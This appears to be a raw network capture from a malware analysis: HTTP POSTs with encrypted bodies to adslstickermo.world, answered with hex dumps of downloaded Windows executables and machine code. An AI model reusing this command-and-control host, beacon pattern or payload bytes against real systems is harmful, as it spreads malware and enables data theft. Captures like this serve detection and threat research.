2024-01-03 17:25:02 UTC	1369	IN	Data Raw: c8 8b 40 14 03 45 c4 89 c0 89 c2 48 8d 4d c8 e8 23 de 00 00 a8 01 75 02 eb 3a 8b 45 c4 41 89 c0 48 8b 45 d8 48 8b 10 8b 45 d0 48 01 c2 48 8b 4d c8 48 8b 45 c8 8b 40 14 48 01 c1 e8 17 e5 ff ff 8b 4d c4 48 8b 45 c8 03 48 14 89 48 14 c7 45 c4 00 00 00 00 83 7d c4 00 75 2a 48 8b 45 c8 81 78 14 00 00 40 06 77 1d 48 8b 45 d8 48 8b 08 e8 34 2c 00 00 48 8b 4d c8 48 8b 45 d8 48 89 08 c6 45 ff 01 eb 0f eb 00 48 8b 4d c8 e8 18 2c 00 00 c6 45 ff 00 8a 45 ff 24 01 0f b6 c0 48 83 c4 70 5d c3 66 0f 1f 44 00 00 55 48 83 ec 30 48 8d 6c 24 30 b9 10 d5 00 00 e8 2c 2a 01 00 48 89 45 f0 48 83 7d f0 00 75 0d 48 c7 45 f8 00 00 00 00 e9 c8 00 00 00 48 8b 4d f0 ba 00 40 00 00 e8 36 8d 02 00 83 f8 00 75 16 48 8b 4d f0 e8 b8 2b 00 00 48 c7 45 f8 00 00 00 00 e9 9f 00 00 00 48 8b 4d Data Ascii: @EHM#u:EAHEHEHHMHE@HMHEHHE}uHEx@wHEH4,HMHEHEHM,EE$Hp]fDUH0Hl$0,HEH}uHEHM@6uHM+HEHM
2024-01-03 17:25:02 UTC	1369	IN	Data Raw: e8 c9 61 03 00 66 c7 85 00 04 00 00 00 00 48 8d 85 00 04 00 00 48 89 45 30 48 8d 0d 3e 5f 04 00 48 8d 95 1a 0b 00 00 e8 22 93 00 00 4c 8b 4d 30 48 89 c2 48 c7 c1 02 00 00 80 31 c0 41 89 c0 c7 44 24 20 04 01 00 00 e8 d2 23 01 00 48 8d 8d e8 03 00 00 e8 86 68 03 00 0f b7 85 00 04 00 00 83 f8 00 74 32 48 8d 95 00 04 00 00 48 8d 8d d0 03 00 00 e8 47 9a 03 00 48 8d 8d e8 03 00 00 48 8d 95 d0 03 00 00 e8 c4 80 03 00 48 8d 8d d0 03 00 00 e8 38 61 03 00 48 8d 8d e8 03 00 00 e8 4c 77 00 00 a8 01 0f 85 7b 01 00 00 48 8d 95 60 08 00 00 48 8d 8d b8 03 00 00 e8 01 9a 03 00 48 8d 8d e8 03 00 00 48 8d 95 b8 03 00 00 e8 7e 80 03 00 48 8d 8d b8 03 00 00 e8 f2 60 03 00 48 8d 0d 2b 4f 04 00 48 8d 95 98 0b 00 00 e8 5f 92 00 00 48 89 c2 48 8d 8d a0 03 00 00 e8 c0 99 03 00 48 Data Ascii: afHHE0H>_H"LM0HH1AD$ #Hht2HHGHHH8aHLw{H`HHH~H`H+OH_HHH

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:25:03 UTC	150	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 310 Connection: Close Cache-Control: no-cache
2024-01-03 17:25:03 UTC	310	OUT	Data Raw: 64 37 c7 13 5c ae 99 61 f2 56 32 2c e3 65 0f 2f 60 ca 7d 27 7e 71 2d 4b 52 da 23 f2 93 ea 61 cd 64 4b c5 b6 0f 95 54 b0 50 ff b3 c2 38 c7 ad 89 01 ee 0f 0e 90 91 62 b8 fd 4a 4e e3 d5 23 a8 5b 50 30 0b 19 34 78 79 09 ff 0d 8b 34 5f de 35 e7 44 3b 01 37 52 af 42 ce 87 07 78 4d 11 b5 85 6f 06 83 ae 39 72 1a 43 e2 e3 92 62 30 f9 f8 65 6d f5 b1 a4 db 35 d1 12 95 84 a2 ba ac ce 57 17 aa 42 c9 17 e0 d6 a9 75 a7 de f1 5b 69 39 9f d0 75 25 99 0d 01 29 89 75 9f be 76 2c 8c 7f 63 4b 08 03 00 da f7 47 45 ac 71 8a c1 f7 76 da 07 fa e3 6a a7 81 70 c0 31 04 38 fb ba ae b5 48 7f 75 5c 57 86 98 5f 4c ba 18 57 6e 8b 75 5c ef 6b 55 62 8c b0 54 a4 0b 51 cc 30 d9 d4 90 a2 fa b5 ec e0 df 0e 00 ed 8e 8a 6c 28 cc e2 51 c3 99 60 1e 00 31 7a 03 e5 ca df 4d 41 ce 5b 4d 6a 0c 96 0e Data Ascii: d7\aV2,e/`}'~q-KR#adKTP8bJN#[P04xy4_5D;7RBxMo9rCb0em5WBu[i9u%)uv,cKGEqvjp18Hu\W_LWnu\kUbTQ0l(Q`1zMA[Mj
2024-01-03 17:25:04 UTC	578	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:25:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VENYCQ3ML66g1ASlfpzM9Bmp9kNe3G2tLsSxoudQWnW5BYD1YwSOVx3arahdnS5uZDpF%2BINE%2BiEjARytK3OH5S%2BTfMZaC01iG12s6Q4vtnRwyGmO%2Fr0q1guBAJhqsqMMoPSXZ0lt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf0597a484689-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:25:04 UTC	791	IN	Data Raw: 37 34 63 36 0d 0a 03 00 00 00 00 00 02 02 00 00 00 00 d5 b3 94 65 ea 1c e3 73 00 88 1d 00 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 56 52 62 37 12 33 0c 64 12 33 0c 64 12 33 0c 64 06 58 0f 65 1c 33 0c 64 06 58 09 65 a2 33 0c 64 06 58 08 65 00 33 0c 64 40 46 09 65 30 33 0c 64 40 46 08 65 03 33 0c 64 40 46 0f 65 0a 33 0c 64 88 5a 08 65 1a 33 0c 64 d6 46 08 65 04 31 0c 64 06 58 0d 65 1f 33 0c 64 12 33 0d 64 8a 33 0c 64 d6 Data Ascii: 74c6esMZ@ !L!This program cannot be run in DOS mode.$VRb73d3d3dXe3dXe3dXe3d@Fe03d@Fe3d@Fe3dZe3dFe1dXe3d3d3d
2024-01-03 17:25:04 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-01-03 17:25:04 UTC	1369	IN	Data Raw: ff 39 45 f0 74 74 8b 45 18 89 45 e0 8b 45 14 89 45 dc 8b 75 10 8b 7d f0 31 c0 c7 04 24 00 00 00 00 c7 44 24 04 32 e5 e4 bc e8 40 0d 00 00 8b 55 dc 8b 4d e0 89 3c 24 89 74 24 04 89 54 24 08 89 4c 24 0c ff d0 83 ec 10 83 f8 00 0f 95 c0 24 01 88 45 f6 8b 45 f0 89 45 e4 31 c0 c7 04 24 00 00 00 00 c7 44 24 04 32 d0 07 b9 e8 ff 0c 00 00 8b 4d e4 89 0c 24 ff d0 83 ec 04 8a 45 f6 24 01 0f b6 c0 83 c4 38 5e 5f 5d c3 0f 1f 44 00 00 55 89 e5 56 83 e4 f8 81 ec d8 00 00 00 8b 45 18 8b 45 14 8a 45 10 8b 45 0c 8b 45 08 8d 84 24 ac 00 00 00 83 c0 04 89 84 24 a8 00 00 00 83 7d 0c ff 0f 84 c0 01 00 00 c7 84 24 a4 00 00 00 80 00 00 00 8b 45 14 89 44 24 1c c7 04 24 e5 ca f9 73 e8 bb 27 02 00 89 c1 8b 44 24 1c 21 c8 83 f8 00 74 49 8b 75 0c c7 04 24 06 00 00 00 c7 44 24 04 d2 Data Ascii: 9EttEEEEu}1$D$2@UM<$t$T$L$$EEE1$D$2M$E$8^_]DUVEEEEE$$}$ED$$s'D$!tIu$D$
2024-01-03 17:25:04 UTC	1369	IN	Data Raw: e8 b0 dd 00 00 89 45 f4 eb 53 8d 45 d4 89 45 c8 31 c0 c7 04 24 00 00 00 00 c7 44 24 04 56 df 04 b8 e8 ef 07 00 00 8b 4d c8 89 0c 24 ff d0 83 ec 04 89 45 f4 83 7d f4 00 75 21 31 c0 c7 04 24 00 00 00 00 c7 44 24 04 31 0a 3d b9 e8 c5 07 00 00 31 c9 c7 04 24 00 00 00 00 ff d0 eb 00 8b 4d f4 8b 45 08 89 0c 85 14 f3 1c 10 c7 45 d0 00 00 00 00 83 7d f4 00 74 3e 8b 45 0c 8b 4d f4 89 0c 24 89 44 24 04 e8 4c bc 00 00 89 45 d0 83 7d d0 00 75 21 31 c0 c7 04 24 00 00 00 00 c7 44 24 04 31 0a 3d b9 e8 6d 07 00 00 31 c9 c7 04 24 00 00 00 00 ff d0 eb 00 8b 4d 0c 8b 45 f8 89 0c 85 dc f3 1c 10 8b 4d d0 8b 45 f8 89 0c 85 04 da 1c 10 8b 45 d0 89 45 fc 8b 45 fc 83 c4 40 5d c3 0f 1f 84 00 00 00 00 00 55 89 e5 56 83 ec 20 8b 45 14 8b 45 10 8b 45 0c 8b 45 08 c6 45 fb 00 c6 45 fa Data Ascii: ESEE1$D$VM$E}u!1$D$1=1$MEE}t>EM$D$LE}u!1$D$1=m1$MEMEEEE@]UV EEEEEE
2024-01-03 17:25:04 UTC	1369	IN	Data Raw: 00 00 00 8b 45 b8 89 85 78 ff ff ff 0f b6 45 ae 89 85 6c ff ff ff c7 04 24 e8 ca f9 73 e8 ca 1d 02 00 89 c1 8b 85 6c ff ff ff 21 c8 89 85 70 ff ff ff c7 04 24 e5 ca f9 73 e8 ae 1d 02 00 89 c1 8b 85 70 ff ff ff d3 e0 89 85 7c ff ff ff 0f b6 45 af 25 c0 00 00 00 89 85 74 ff ff ff c7 04 24 e1 ca f9 73 e8 83 1d 02 00 8b 95 74 ff ff ff 89 c1 8b 85 78 ff ff ff d3 fa 8b 8d 7c ff ff ff 09 d1 8a 04 08 88 45 83 eb 07 b0 3d 88 45 83 eb 00 8a 4d 83 8b 45 b0 88 48 02 83 7d a8 02 76 15 8b 45 b8 0f b6 4d af 83 e1 3f 8a 04 08 88 85 6b ff ff ff eb 0a b0 3d 88 85 6b ff ff ff eb 00 8a 8d 6b ff ff ff 8b 45 b0 88 48 03 8b 45 b0 83 c0 04 89 45 b0 e9 26 fe ff ff 8b 45 b0 c6 00 00 83 7d 10 00 74 0d 8b 4d b0 8b 45 b4 29 c1 8b 45 10 89 08 eb 00 8b 45 b4 81 c4 a0 00 00 00 5d c3 66 Data Ascii: ExEl$sl!p$sp\|E%t$stx\|E=EMEH}vEM?k=kkEHEE&E}tME)EE]f
2024-01-03 17:25:04 UTC	1369	IN	Data Raw: 44 24 04 e8 5b 22 00 00 8b 4d ac 89 45 b8 8b 45 b8 83 c0 05 89 45 88 8b 45 b8 89 45 84 8d 45 b4 89 04 24 e8 bb 10 04 00 83 ec 04 8b 4d ac 8b 55 84 8b 45 88 8b 75 b4 89 34 24 89 54 24 04 89 44 24 08 e8 fc c7 03 00 83 ec 0c c6 45 e7 01 f6 45 e7 01 75 08 8b 4d ac e8 57 b0 03 00 8b 45 b0 81 c4 88 00 00 00 5e 5d c3 66 66 2e 0f 1f 84 00 00 00 00 00 55 89 e5 83 ec 34 8b 45 18 8b 45 14 8b 45 10 8b 45 0c 8b 45 08 8b 45 08 8b 00 8b 40 14 31 c9 29 c1 31 c0 83 e8 10 01 c1 31 c0 29 c8 8b 55 18 31 c9 29 d1 29 c8 89 45 f8 8b 45 f8 8b 4d 08 8b 09 3b 41 14 0f 86 23 01 00 00 83 7d 0c 00 0f 86 19 01 00 00 8b 45 f8 8b 4d 08 89 0c 24 89 44 24 04 e8 8b 26 03 00 a8 01 75 05 e9 fe 00 00 00 8b 45 08 8b 00 89 45 f4 8b 45 f4 8b 4d f4 03 41 14 89 45 f0 8b 45 f0 83 c0 10 89 45 ec 83 Data Ascii: D$["MEEEEEE$MUEu4$T$D$EEuMWE^]ff.U4EEEEEE@1)11)U1))EEM;A#}EM$D$&uEEEMAEEE
2024-01-03 17:25:04 UTC	1369	IN	Data Raw: 06 00 00 00 eb 00 eb 23 0f b6 45 c2 25 fe 00 00 00 3d c2 00 00 00 75 11 8b 45 b0 3b 45 dc 0f 93 c0 24 01 0f b6 c0 89 45 d8 eb 00 eb 00 eb 00 eb 00 8b 45 b0 3b 45 dc 73 17 8b 45 b8 0f b6 4d bc 39 c8 74 0c c7 45 fc 00 00 00 00 e9 99 01 00 00 0f b6 45 e2 03 45 b8 83 f8 20 76 0c c7 45 fc 00 00 00 00 e9 81 01 00 00 8b 45 08 8b 40 10 89 45 90 c7 04 24 ef ca f9 73 e8 bd 12 02 00 89 c1 8b 45 90 39 c8 72 0c c7 45 fc 00 00 00 00 e9 57 01 00 00 8a 55 e3 8b 45 08 8b 4d 08 8b 49 10 88 54 08 14 8a 55 e2 8b 45 08 8b 4d 08 8b 49 10 88 54 08 1c 8b 45 08 89 45 8c 8b 40 10 89 45 88 c7 04 24 e6 ca f9 73 e8 70 12 02 00 8b 4d 88 89 c2 8b 45 8c 01 d1 89 48 10 8b 45 08 8b 50 08 0f b6 45 e2 01 c2 8b 4d b4 8b 45 b8 89 14 24 89 4c 24 04 89 44 24 08 e8 41 4d 14 00 8b 4d b8 0f b6 45 Data Ascii: #E%=uE;E$EE;EsEM9tEEE vEE@E$sE9rEWUEMITUEMITEE@E$spMEHEPEME$L$D$AMME
2024-01-03 17:25:04 UTC	1369	IN	Data Raw: 8d 5c 24 48 89 59 14 89 79 0c 89 71 04 89 11 c7 41 28 00 00 00 00 c7 41 20 00 00 00 00 c7 41 18 00 00 00 00 c7 41 10 00 00 00 00 c7 41 08 04 00 00 00 ff d0 89 54 24 3c 89 44 24 38 8b 44 24 38 8b 4c 24 3c 09 c8 74 20 eb 00 8b 4c 24 38 8b 54 24 3c 89 e0 89 50 04 89 08 e8 43 90 02 00 c7 44 24 5c 00 00 00 00 eb 08 c7 44 24 5c 01 00 00 00 8b 44 24 5c 8d 65 f4 5e 5f 5b 5d c3 0f 1f 44 00 00 55 89 e5 83 ec 0c 8b 45 08 c7 45 fc 00 00 00 00 8b 45 08 89 04 24 e8 65 c8 02 00 83 c0 70 83 c0 28 89 45 f8 8b 45 f8 83 38 00 76 17 8b 45 08 8b 4d f8 8b 09 05 10 f6 0a f5 01 c8 2d 10 f6 0a f5 89 45 fc 8b 45 fc 83 c4 0c 5d c3 0f 1f 44 00 00 55 89 e5 57 56 83 ec 4c 89 4d f0 8b 4d f0 89 4d d0 8b 41 10 2b 41 0c 89 45 d4 c7 04 24 ee ca f9 73 e8 ea 0c 02 00 89 c1 8b 45 d4 39 c8 73 Data Ascii: \$HYyqA(A AAAT$<D$8D$8L$<t L$8T$<PCD$\D$\D$\e^_[]DUEEE$ep(EE8vEM-EE]DUWVLMMMA+AE$sE9s
2024-01-03 17:25:04 UTC	1369	IN	Data Raw: a4 fb 01 00 83 ec 04 c6 45 ab 01 8d 4d ac e8 65 85 03 00 8b 8d 5c ff ff ff 89 c2 8b 85 60 ff ff ff 8b 75 cc 89 34 24 89 54 24 04 89 4c 24 08 89 44 24 0c e8 20 56 03 00 88 85 67 ff ff ff 8a 85 67 ff ff ff 88 85 5b ff ff ff f6 45 ab 01 75 02 eb 08 8d 4d ac e8 fe 8c 03 00 f6 45 bb 01 75 02 eb 08 8d 4d bc e8 ee 8c 03 00 8a 85 5b ff ff ff a8 01 75 05 e9 52 02 00 00 8d 4d 84 e8 37 15 03 00 8b 45 d8 0f b7 00 25 00 40 00 00 83 f8 00 74 14 8b 4d 0c e8 0f c3 03 00 c7 45 ec 03 00 00 00 e9 11 02 00 00 8b 45 d8 0f b7 40 0a 83 f8 00 7e 67 8b 4d 08 e8 ff 97 02 00 89 c1 e8 68 84 03 00 83 f8 00 76 53 8b 4d 08 e8 eb 97 02 00 89 c1 e8 54 84 03 00 89 85 54 ff ff ff 8b 4d 08 e8 d6 97 02 00 89 c1 e8 8f 84 03 00 89 c1 8b 85 54 ff ff ff 8b 55 d0 8b 75 d8 0f b7 76 0a 01 f2 89 14 Data Ascii: EMe\`u4$T$L$D$ Vgg[EuMEuM[uRM7E%@tMEE@~gMhvSMTTMTUuv

Timestamp	Bytes transferred	Direction	Data
2024-01-03 17:25:06 UTC	150	OUT	POST / HTTP/1.1 Accept: / User-Agent: User metrics Host: adslstickermo.world Content-Length: 310 Connection: Close Cache-Control: no-cache
2024-01-03 17:25:06 UTC	310	OUT	Data Raw: 17 63 a7 a4 2a 7a 79 b2 ef c1 53 d7 85 64 54 54 9d cc de 1d 24 3d c6 5b 51 c1 41 eb 2a 6d 7e 85 d2 11 59 4a 46 2d 6d 9c ef b9 09 2f 83 f3 fd af 01 52 8b c2 db 6c ed b5 91 66 1c 00 d1 f7 00 b1 a4 15 75 d7 5a 18 a1 29 7a f7 b7 4d c3 19 4d f5 a5 96 0b 19 3a e3 e8 e5 09 88 d7 aa 83 9f 0b 95 a1 e0 30 f0 72 17 f6 b2 2e 7f 6a f9 cf a5 4d 97 21 47 4d f3 64 c6 e1 9a 1b 6e f7 63 52 d4 05 83 28 ea 54 c7 44 76 f2 2e 57 24 9b 30 b8 79 52 1a 6c 1c 6b fa 71 8f 2d 09 d1 bb 3e 66 22 e5 ff 38 5b 8d f5 6d c2 3c 70 6f 7f 28 31 ad de 03 35 10 03 3c 2e d2 5e ea 3a 66 e9 a3 46 1b cf ae 20 ff 5e ca 56 ac f7 cb c5 3d 84 79 f5 f7 81 ff 2b 2a 1d ea a8 ed 4f aa 5b 9d 45 19 1c 39 2a d1 34 a2 a9 5e 64 ac 18 e5 47 17 6d d3 5d 0e 11 9d e1 97 bc 8e e5 48 0c bd 4d 0c 8d 77 90 71 49 2b 7f Data Ascii: czySdTT$=[QAm~YJF-m/RlfuZ)zMM:0r.jM!GMdncR(TDv.W$0yRlkq->f"8[m<po(15<.^:fF ^V=y+O[E94^dGm]HMwqI+
2024-01-03 17:25:07 UTC	574	IN	HTTP/1.1 200 OK Date: Wed, 03 Jan 2024 17:25:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x%2FaMXonqfPLHPXWYpSbnDdXfTjau%2B3GNsbpeEVlPuo3hRsrDXkqyNJauZLeiUYwds7Tx0CeLqINZxSzFt1MElwqmrkoPCcBg9r652my9ucmdtKEijGewBiFXUX33UZs1os30tuPj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83fcf06ced2c2fd4-DFW alt-svc: h3=":443"; ma=86400
2024-01-03 17:25:07 UTC	795	IN	Data Raw: 37 38 61 66 0d 0a 04 00 00 00 00 08 01 02 00 00 00 00 6e 91 83 65 0e cb 79 a4 00 8c 0e 00 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a3 77 f7 8c e7 16 99 df e7 16 99 df e7 16 99 df f3 7d 9a de ec 16 99 df f3 7d 9c de 76 16 99 df f3 7d 9d de f5 16 99 df f3 7d 98 de e2 16 99 df e7 16 98 df 66 16 99 df 23 63 9d de e6 16 99 df b5 63 9c de c6 16 99 df b5 63 9d de e8 16 99 df b5 63 9a de f1 16 99 df 23 63 9a de e6 16 99 df e7 Data Ascii: 78afneyMZ@!L!This program cannot be run in DOS mode.$w}}v}}f#cccc#c
2024-01-03 17:25:07 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-01-03 17:25:07 UTC	1369	IN	Data Raw: 00 00 00 00 c7 44 24 1c 00 00 00 00 ff d0 83 ec 20 89 45 e8 83 7d e8 00 75 2e 8b 45 f0 89 45 c8 c7 04 24 13 00 00 00 c7 44 24 04 2b d6 25 d2 e8 b6 a4 00 00 8b 4d c8 89 0c 24 ff d0 83 ec 04 c7 45 f4 00 00 00 00 eb 08 eb 00 8b 45 e8 89 45 f4 8b 45 f4 83 c4 50 5e 5f 5d c3 55 89 e5 81 ec 4c 02 00 00 8b 45 08 31 c0 c7 04 24 00 00 00 00 c7 44 24 04 48 73 40 d9 e8 6e a4 00 00 31 c9 c7 04 24 02 00 00 00 c7 44 24 04 00 00 00 00 ff d0 83 ec 08 89 45 f8 b8 ff ff ff ff 39 45 f8 75 0c c7 45 fc 00 00 00 00 e9 d6 00 00 00 c7 45 f4 00 00 00 00 c7 85 c8 fd ff ff 2c 02 00 00 8b 45 f8 89 85 c4 fd ff ff 31 c0 c7 04 24 00 00 00 00 c7 44 24 04 95 3b 14 df e8 0f a4 00 00 8b 95 c4 fd ff ff 8d 8d c8 fd ff ff 89 14 24 89 4c 24 04 ff d0 83 ec 08 83 f8 00 74 56 eb 00 8b 85 d0 fd ff Data Ascii: D$ E}u.EE$D$+%M$EEEEP^_]ULE1$D$Hs@n1$D$E9EuEE,E1$D$;$L$tV
2024-01-03 17:25:07 UTC	1369	IN	Data Raw: 45 ec 66 01 c8 66 89 45 f6 e9 51 ff ff ff 83 c4 18 5d c3 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 89 e5 53 57 56 83 ec 30 8b 45 08 c7 45 ec 00 00 00 00 8b 45 08 89 45 e4 c7 04 24 09 00 00 00 c7 44 24 04 92 75 82 dd e8 43 9f 00 00 8b 55 e4 31 c9 8d 4d ec 89 14 24 c7 44 24 04 01 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 89 4c 24 10 ff d0 83 ec 14 31 c9 89 04 24 c7 44 24 04 00 00 00 00 e8 55 e2 00 00 a9 01 00 00 00 0f 84 bb 00 00 00 31 c0 c7 04 24 00 00 00 00 c7 44 24 04 ee 5a 70 d1 e8 e4 9e 00 00 ff d0 89 45 e0 c7 04 24 78 43 dc a3 e8 e3 09 01 00 89 c1 8b 45 e0 39 c8 0f 85 87 00 00 00 8b 45 ec 89 04 24 e8 5b a6 00 00 89 45 e8 83 7d e8 00 75 09 c7 45 f0 00 00 00 00 eb 71 8b 45 ec 89 45 d8 8b 75 e8 8b 5d 08 c7 04 24 09 00 00 00 c7 44 24 04 Data Ascii: EffEQ]fffff.USWV0EEEE$D$uCU1M$D$D$D$L$1$D$U1$D$ZpE$xCE9E$[E}uEqEEu]$D$
2024-01-03 17:25:07 UTC	1369	IN	Data Raw: ff 89 0c 24 89 44 24 04 e8 2b 9a 00 00 8b 8d 08 f7 ff ff 31 d2 c7 04 24 00 00 00 00 c7 44 24 04 1c 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 89 4c 24 10 ff d0 83 ec 14 83 f8 00 74 05 e9 0e 03 00 00 8d 0d e0 f0 0c 10 8d 45 b2 89 0c 24 89 44 24 04 e8 ec c3 00 00 8d 8d aa fd ff ff 8d 95 a2 fb ff ff 89 14 24 89 4c 24 04 89 44 24 08 e8 10 9b 00 00 8d 85 a2 fb ff ff 8d 8d 94 fb ff ff 89 04 24 e8 5c fc 01 00 83 ec 04 8d 0d d5 f0 0c 10 8d 45 e4 89 0c 24 89 44 24 04 e8 a4 c3 00 00 8d 8d 88 fb ff ff 89 04 24 e8 36 fc 01 00 83 ec 04 8d 8d 94 fb ff ff 8d 85 88 fb ff ff 89 04 24 e8 bf fe 01 00 83 ec 04 8d 8d 88 fb ff ff e8 e1 e2 01 00 c7 85 84 fb ff ff 00 00 00 00 8d 85 34 f9 ff ff 31 c9 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 50 02 00 00 e8 e7 fb Data Ascii: $D$+1$D$D$D$L$tE$D$$L$D$$\E$D$$6$41$D$D$P
2024-01-03 17:25:07 UTC	1369	IN	Data Raw: 42 0e 10 89 e0 89 50 0c 89 48 08 c7 40 04 00 00 00 00 c7 00 00 00 00 00 e8 a2 ce 00 00 a9 01 00 00 00 74 0d c7 44 24 38 00 00 00 00 e9 e1 00 00 00 eb 00 c7 44 24 2c 00 00 00 00 c7 44 24 28 00 00 00 00 c7 44 24 24 00 08 00 00 83 3d 28 4c 0e 10 00 75 33 8d 0d b0 f1 0c 10 8d 44 24 4c 89 0c 24 c7 44 24 04 00 08 00 00 89 44 24 08 e8 ed 70 00 00 89 04 24 c7 44 24 04 00 08 00 00 e8 4d 80 01 00 a3 28 4c 0e 10 83 3d 28 4c 0e 10 00 74 7a 89 e0 8d 8c 24 4c 08 00 00 89 48 04 c7 00 61 fa 0c 10 e8 c8 34 00 00 89 c2 8b 0d 28 4c 0e 10 89 e0 89 50 04 89 08 e8 94 89 01 00 89 44 24 20 8b 44 24 20 89 44 24 1c 8b 45 10 8b 7c 24 30 8b 5c 24 34 8b 15 70 42 0e 10 8b 35 74 42 0e 10 89 e1 89 41 14 8b 44 24 1c 89 59 10 89 79 0c 89 71 04 89 11 c7 41 18 00 00 00 00 c7 41 08 02 00 00 Data Ascii: BPH@tD$8D$,D$(D$$=(Lu3D$L$D$D$p$D$M(L=(Ltz$LHa4(LPD$ D$ D$E\|$0\$4pB5tBAD$YyqAA
2024-01-03 17:25:07 UTC	1369	IN	Data Raw: ec 04 c7 45 f8 ff ff ff ff eb 00 8b 45 f8 83 c4 34 5e 5d c3 66 90 55 89 e5 83 ec 08 8b 45 08 8b 45 08 89 04 24 e8 2c 0c 01 00 89 45 fc 8b 45 08 89 04 24 e8 0e 20 01 00 89 c1 8b 45 fc 0f b7 49 10 01 c8 83 c4 08 5d c3 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 89 e5 83 ec 08 8b 45 08 8b 45 08 89 04 24 e8 bc 5e 01 00 89 45 fc 8b 45 08 89 04 24 e8 ce c8 00 00 89 c1 8b 45 fc 0f b7 49 10 01 c8 83 c4 08 5d c3 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 89 e5 81 ec 7c 04 00 00 8b 45 08 8d 0d d5 f0 0c 10 8d 45 fa 89 0c 24 89 44 24 04 e8 df b8 00 00 8b 4d 08 8d 95 f2 fd ff ff 89 14 24 89 4c 24 04 89 44 24 08 e8 06 90 00 00 a8 01 75 05 e9 1f 01 00 00 8d 85 f2 fd ff ff 89 85 98 fb ff ff 31 c0 c7 04 24 00 00 00 00 c7 44 24 04 45 19 82 da e8 8b 8e 00 00 8b 95 98 fb Data Ascii: EE4^]fUEE$,EE$ EI]fffff.UEE$^EE$EI]fffff.U\|EE$D$M$L$D$u1$D$E
